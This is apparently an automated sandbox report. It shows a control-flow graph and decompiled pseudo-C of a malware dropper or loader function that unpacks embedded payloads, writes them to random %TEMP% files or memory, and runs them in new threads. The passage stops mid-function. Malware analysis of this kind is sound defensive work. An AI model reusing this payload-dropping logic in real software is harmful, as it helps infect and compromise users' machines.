                                                                                                                                                                                                                                                                                                        control_flow_graph 232 40062b0-40062c4 233 40062ca-40062ce 232->233 234 4006c4e 232->234 233->234 236 40062d4-40062e0 233->236 235 4006c51-4006c54 234->235 236->234 237 40062e6-40062ed 236->237 237->234 238 40062f3-4006314 237->238 240 400631a-400631e 238->240 241 400642e-4006453 238->241 242 4006320-400633a 240->242 243 4006343-4006363 240->243 246 4006459-400645d 241->246 247 4006c2f-4006c36 241->247 242->243 245 400633c-400633e 242->245 248 4006429 243->248 249 4006369-4006375 243->249 245->235 250 4006482-40064a2 246->250 251 400645f-4006479 246->251 252 4006c44 247->252 253 4006c38-4006c42 247->253 248->241 249->248 254 400637b-4006384 249->254 255 40065f3-40065fc 250->255 256 40064a8-40064b4 250->256 251->250 257 400647b-400647d 251->257 252->234 253->234 254->248 258 400638a-4006393 254->258 260 4006603-400660f 255->260 261 40065fe 255->261 256->255 259 40064ba-400654c GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 256->259 257->235 258->248 262 4006399-40063a2 258->262 259->255 288 4006552-4006586 WriteFile 259->288 264 4006615-4006621 260->264 265 4006bdd-4006be9 260->265 261->261 266 4006410-4006424 call 4001ee0 262->266 267 40063a4-40063ca VirtualAlloc 262->267 264->265 270 4006627-4006640 call 4007250 264->270 273 4006c18-4006c24 265->273 274 4006beb-4006bf7 265->274 278 4006427 266->278 271 40063cc-40063e4 call 4006260 267->271 272 400640e 267->272 289 4006642 270->289 290 4006647-400664e 270->290 291 40063e6-40063fa call 4001ee0 271->291 292 40063fd-4006408 VirtualFree 271->292 272->278 275 4006c26 273->275 276 4006c2a 273->276 274->273 282 4006bf9-4006c16 call 400a360 274->282 275->276 276->247 278->241 282->276 294 4006588-4006591 288->294 295 40065dd-40065e4 288->295 289->290 296 4006752-400675b 290->296 297 4006654-4006674 VirtualAlloc 290->297 291->292 292->272 294->295 302 4006593-40065c7 CloseHandle call 4006c60 call 4001e60 294->302 295->255 299 40065e6-40065ed CloseHandle 295->299 300 4006761-4006788 296->300 301 40069ba-4006a49 GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 296->301 297->296 303 400667a-4006747 call 4007b70 call 40097a0 CreateThread CloseHandle 297->303 299->255 304 4006858-4006864 call 4002070 300->304 305 400678e-40067c0 VirtualAlloc 300->305 327 4006bd6 301->327 328 4006a4f-4006a75 301->328 333 40065d8 302->333 334 40065c9-40065d0 call 40074a0 ExitProcess 302->334 303->296 316 400686a-4006871 304->316 311 4006856 305->311 312 40067c6-40067e7 call 4006260 305->312 311->316 331 4006842-4006850 VirtualFree 312->331 332 40067e9-4006807 call 4002070 312->332 323 40069b0 316->323 324 4006877-400687e 316->324 323->301 329 4006880-4006891 call 40073c0 324->329 330 4006894-400689d 324->330 327->265 336 4006a7b-4006aad VirtualAlloc 328->336 337 4006b1e-4006b3c WriteFile 328->337 329->330 339 40068a3-40068c8 call 40097a0 330->339 340 400698a-4006993 330->340 331->311 332->331 357 4006809-400683a VirtualAlloc call 4007b70 332->357 333->295 335 40065d8 call 4006cf0 333->335 335->295 343 4006b1c 336->343 344 4006aaf-4006ad0 call 4006260 336->344 348 4006b42-4006b49 337->348 361 40068e9-400690d VirtualAlloc 339->361 362 40068ca-40068e7 339->362 345 4006995-40069a6 call 4002510 340->345 346 40069a9 340->346 343->348 366 4006ad2-4006b02 WriteFile 344->366 367 4006b08-4006b16 VirtualFree 344->367 345->346 346->323 354 4006bc9-4006bd0 CloseHandle 348->354 355 4006b4b-4006b57 348->355 354->327 355->354 360 4006b59-4006b82 CloseHandle call 4001e60 355->360 369 400683f 357->369 374 4006b84-4006b8b 360->374 375 4006bc7 360->375 364 4006934-400693d 361->364 365 400690f-4006931 call 4007b70 361->365 362->364 364->340 371 400693f-4006984 CreateThread CloseHandle 364->371 365->364 366->367 367->343 369->331 371->340 376 4006ba1-4006baa 374->376 377 4006b8d-4006b9e call 40073c0 374->377 375->327 379 4006bc0 376->379 380 4006bac-4006bbd call 4002510 376->380 377->376 379->375 380->379
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E040062B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v13;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				int _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				void _v36;
                                                                                                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                                                                                                        				long _v44;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                                                                                                                                        				long _v56;
                                                                                                                                                                                                                                                                                                        				void _v60;
                                                                                                                                                                                                                                                                                                        				char _v324;
                                                                                                                                                                                                                                                                                                        				void* _v328;
                                                                                                                                                                                                                                                                                                        				char _v340;
                                                                                                                                                                                                                                                                                                        				char _v604;
                                                                                                                                                                                                                                                                                                        				int _v608;
                                                                                                                                                                                                                                                                                                        				long _v612;
                                                                                                                                                                                                                                                                                                        				signed int _v616;
                                                                                                                                                                                                                                                                                                        				void* _v620;
                                                                                                                                                                                                                                                                                                        				void* _v624;
                                                                                                                                                                                                                                                                                                        				void* _v628;
                                                                                                                                                                                                                                                                                                        				int _v632;
                                                                                                                                                                                                                                                                                                        				signed int _v636;
                                                                                                                                                                                                                                                                                                        				long _v640;
                                                                                                                                                                                                                                                                                                        				void* _v644;
                                                                                                                                                                                                                                                                                                        				void* _v648;
                                                                                                                                                                                                                                                                                                        				void* _v652;
                                                                                                                                                                                                                                                                                                        				char _v916;
                                                                                                                                                                                                                                                                                                        				void* _v920;
                                                                                                                                                                                                                                                                                                        				char _v932;
                                                                                                                                                                                                                                                                                                        				char _v1196;
                                                                                                                                                                                                                                                                                                        				long _v1200;
                                                                                                                                                                                                                                                                                                        				int _v1204;
                                                                                                                                                                                                                                                                                                        				long _v1208;
                                                                                                                                                                                                                                                                                                        				void* _v1212;
                                                                                                                                                                                                                                                                                                        				long _v1216;
                                                                                                                                                                                                                                                                                                        				signed int _v1220;
                                                                                                                                                                                                                                                                                                        				void* _v1224;
                                                                                                                                                                                                                                                                                                        				void* _v1228;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t317;
                                                                                                                                                                                                                                                                                                        				signed char _t321;
                                                                                                                                                                                                                                                                                                        				void* _t333;
                                                                                                                                                                                                                                                                                                        				signed int _t340;
                                                                                                                                                                                                                                                                                                        				void* _t349;
                                                                                                                                                                                                                                                                                                        				signed int _t355;
                                                                                                                                                                                                                                                                                                        				void* _t361;
                                                                                                                                                                                                                                                                                                        				void* _t368;
                                                                                                                                                                                                                                                                                                        				void* _t378;
                                                                                                                                                                                                                                                                                                        				void* _t381;
                                                                                                                                                                                                                                                                                                        				signed int _t383;
                                                                                                                                                                                                                                                                                                        				void* _t386;
                                                                                                                                                                                                                                                                                                        				void* _t393;
                                                                                                                                                                                                                                                                                                        				int _t415;
                                                                                                                                                                                                                                                                                                        				signed int _t421;
                                                                                                                                                                                                                                                                                                        				signed int _t428;
                                                                                                                                                                                                                                                                                                        				signed char _t433;
                                                                                                                                                                                                                                                                                                        				void* _t439;
                                                                                                                                                                                                                                                                                                        				signed char _t442;
                                                                                                                                                                                                                                                                                                        				void* _t448;
                                                                                                                                                                                                                                                                                                        				signed int _t452;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t455;
                                                                                                                                                                                                                                                                                                        				void* _t465;
                                                                                                                                                                                                                                                                                                        				void* _t472;
                                                                                                                                                                                                                                                                                                        				void* _t473;
                                                                                                                                                                                                                                                                                                        				void* _t508;
                                                                                                                                                                                                                                                                                                        				void* _t509;
                                                                                                                                                                                                                                                                                                        				void* _t528;
                                                                                                                                                                                                                                                                                                        				void* _t529;
                                                                                                                                                                                                                                                                                                        				void* _t539;
                                                                                                                                                                                                                                                                                                        				void* _t549;
                                                                                                                                                                                                                                                                                                        				void* _t550;
                                                                                                                                                                                                                                                                                                        				void* _t551;
                                                                                                                                                                                                                                                                                                        				void* _t563;
                                                                                                                                                                                                                                                                                                        				void* _t598;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                                        					L99:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 =  *_a4;
                                                                                                                                                                                                                                                                                                        					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                                                        						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                                                        							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                                                                                                                        								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                                                        								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        									L22:
                                                                                                                                                                                                                                                                                                        									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                                                        									__eflags = _t428;
                                                                                                                                                                                                                                                                                                        									_v24 = _t428;
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        									goto L22;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t508 = _v20;
                                                                                                                                                                                                                                                                                                        								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                                                        								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                                        									goto L22;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags =  *0x401435d & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								if(( *0x401435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        									goto L22;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t509 = _v20;
                                                                                                                                                                                                                                                                                                        								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                                        								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        									_t433 = E04001EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                                                        									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                                        									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									L21:
                                                                                                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                                                        								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        								__eflags = _v40;
                                                                                                                                                                                                                                                                                                        								if(_v40 == 0) {
                                                                                                                                                                                                                                                                                                        									L19:
                                                                                                                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t439 = E04006260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                                                        								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                                                        								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                                                        									_t442 = E04001EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                                                        									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                                        									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								goto L19;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v36 =  *_v20;
                                                                                                                                                                                                                                                                                                        								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                                                        								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									return 0;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v13 = 0;
                                                                                                                                                                                                                                                                                                        						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                                                        						_v48 = 0;
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                                                        							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__eflags = _v48;
                                                                                                                                                                                                                                                                                                        							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                                                        								L29:
                                                                                                                                                                                                                                                                                                        								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                                                        								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e274; // 0x2
                                                                                                                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        									L39:
                                                                                                                                                                                                                                                                                                        									_t448 = _v20;
                                                                                                                                                                                                                                                                                                        									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                                                        									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        											L90:
                                                                                                                                                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e278; // 0x3
                                                                                                                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        												L93:
                                                                                                                                                                                                                                                                                                        												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e27c; // 0x4
                                                                                                                                                                                                                                                                                                        												if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                        													_v13 = 1;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												L95:
                                                                                                                                                                                                                                                                                                        												L24:
                                                                                                                                                                                                                                                                                                        												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                                                        												__eflags = _t452;
                                                                                                                                                                                                                                                                                                        												_v48 = _t452;
                                                                                                                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e288; // 0x2
                                                                                                                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        												goto L93;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											_t317 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                                                        											_t455 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                                        											E0400A360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                                                        											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                                                        											goto L95;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        											goto L90;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										_t321 = E04007250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                                        										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        											_t528 = _v20;
                                                                                                                                                                                                                                                                                                        											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                                                        											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                                                        												L48:
                                                                                                                                                                                                                                                                                                        												_t529 = _v20;
                                                                                                                                                                                                                                                                                                        												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                                                        												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                        													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                                                        													E04007D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                                                        													E04009730( &_v932, 4);
                                                                                                                                                                                                                                                                                                        													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                                                        													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                                                        													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                                        													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                                                        													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        														L89:
                                                                                                                                                                                                                                                                                                        														goto L24;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_v1200 = 0;
                                                                                                                                                                                                                                                                                                        													_v1204 = 0;
                                                                                                                                                                                                                                                                                                        													_v1208 = _v56;
                                                                                                                                                                                                                                                                                                        													_t333 = _v20;
                                                                                                                                                                                                                                                                                                        													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                                        													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                                                        														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        														__eflags = _v1212;
                                                                                                                                                                                                                                                                                                        														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                                                        															_t349 = E04006260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                                                        															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                                                        															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                                                        																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                                                        																_v1208 = _v1216;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													__eflags = _v1204;
                                                                                                                                                                                                                                                                                                        													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                                                        														L88:
                                                                                                                                                                                                                                                                                                        														CloseHandle(_v920);
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                                                        														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                                                        															goto L88;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														CloseHandle(_v920);
                                                                                                                                                                                                                                                                                                        														_t340 = E04001E60( &_v916);
                                                                                                                                                                                                                                                                                                        														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        														_v1220 = _t340;
                                                                                                                                                                                                                                                                                                        														__eflags = _v1220;
                                                                                                                                                                                                                                                                                                        														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                                                        															_t465 = _v20;
                                                                                                                                                                                                                                                                                                        															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                                                        															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                                        																E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                                        																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															_t539 = _v20;
                                                                                                                                                                                                                                                                                                        															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                                                        															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        																E04002510(_v1220, 0x400e290);
                                                                                                                                                                                                                                                                                                        																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        															_v8 = 1;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													goto L89;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												_v636 = 0;
                                                                                                                                                                                                                                                                                                        												_v632 = 0;
                                                                                                                                                                                                                                                                                                        												_v640 = 0;
                                                                                                                                                                                                                                                                                                        												_t472 = _v20;
                                                                                                                                                                                                                                                                                                        												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                                        												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        													_t355 = E04002070(_v52);
                                                                                                                                                                                                                                                                                                        													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        													_v636 = _t355;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                                                        													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        													_v644 = _t378;
                                                                                                                                                                                                                                                                                                        													__eflags = _v644;
                                                                                                                                                                                                                                                                                                        													if(_v644 != 0) {
                                                                                                                                                                                                                                                                                                        														_t381 = E04006260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                                                        														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                                                        														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                                                        															_t383 = E04002070(_v644); // executed
                                                                                                                                                                                                                                                                                                        															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        															_v636 = _t383;
                                                                                                                                                                                                                                                                                                        															_t563 = _v20;
                                                                                                                                                                                                                                                                                                        															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                                                        															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                                        																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        																_v632 = _t386;
                                                                                                                                                                                                                                                                                                        																E04007B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                                                        																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												__eflags = _v636;
                                                                                                                                                                                                                                                                                                        												if(_v636 != 0) {
                                                                                                                                                                                                                                                                                                        													_t473 = _v20;
                                                                                                                                                                                                                                                                                                        													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                                                        													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                                                        														E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                                                        														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t549 = _v20;
                                                                                                                                                                                                                                                                                                        													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                                                        													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                                        														_t361 = E040097A0(0x10);
                                                                                                                                                                                                                                                                                                        														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        														_v1228 = _t361;
                                                                                                                                                                                                                                                                                                        														_v648 = _v1228;
                                                                                                                                                                                                                                                                                                        														_t551 = _v20;
                                                                                                                                                                                                                                                                                                        														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                                                        														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                                        															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        															__eflags =  *_v648;
                                                                                                                                                                                                                                                                                                        															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                                                        																E04007B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                                                        																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                                                        																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															 *_v648 = _v632;
                                                                                                                                                                                                                                                                                                        															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														__eflags =  *_v648;
                                                                                                                                                                                                                                                                                                        														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                                                        															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                                                        															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                                                        															_t368 = CreateThread(0, 0, E040077B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        															_v652 = _t368;
                                                                                                                                                                                                                                                                                                        															CloseHandle(_v652);
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_t550 = _v20;
                                                                                                                                                                                                                                                                                                        													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                                                        													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        														E04002510(_v636, 0x400e290);
                                                                                                                                                                                                                                                                                                        														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													_v8 = 1;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        												goto L24;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        											__eflags = _v620;
                                                                                                                                                                                                                                                                                                        											if(_v620 == 0) {
                                                                                                                                                                                                                                                                                                        												goto L48;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											E04007B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                                                        											_t393 = E040097A0(0x20);
                                                                                                                                                                                                                                                                                                        											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                                                        											_v1224 = _t393;
                                                                                                                                                                                                                                                                                                        											_v624 = _v1224;
                                                                                                                                                                                                                                                                                                        											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                                                        											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                                                                        											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                                                        											_v628 = CreateThread(0, 0, E04006DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                                                        											CloseHandle(_v628);
                                                                                                                                                                                                                                                                                                        											goto L24;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										goto L24;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L24;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                        									goto L39;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
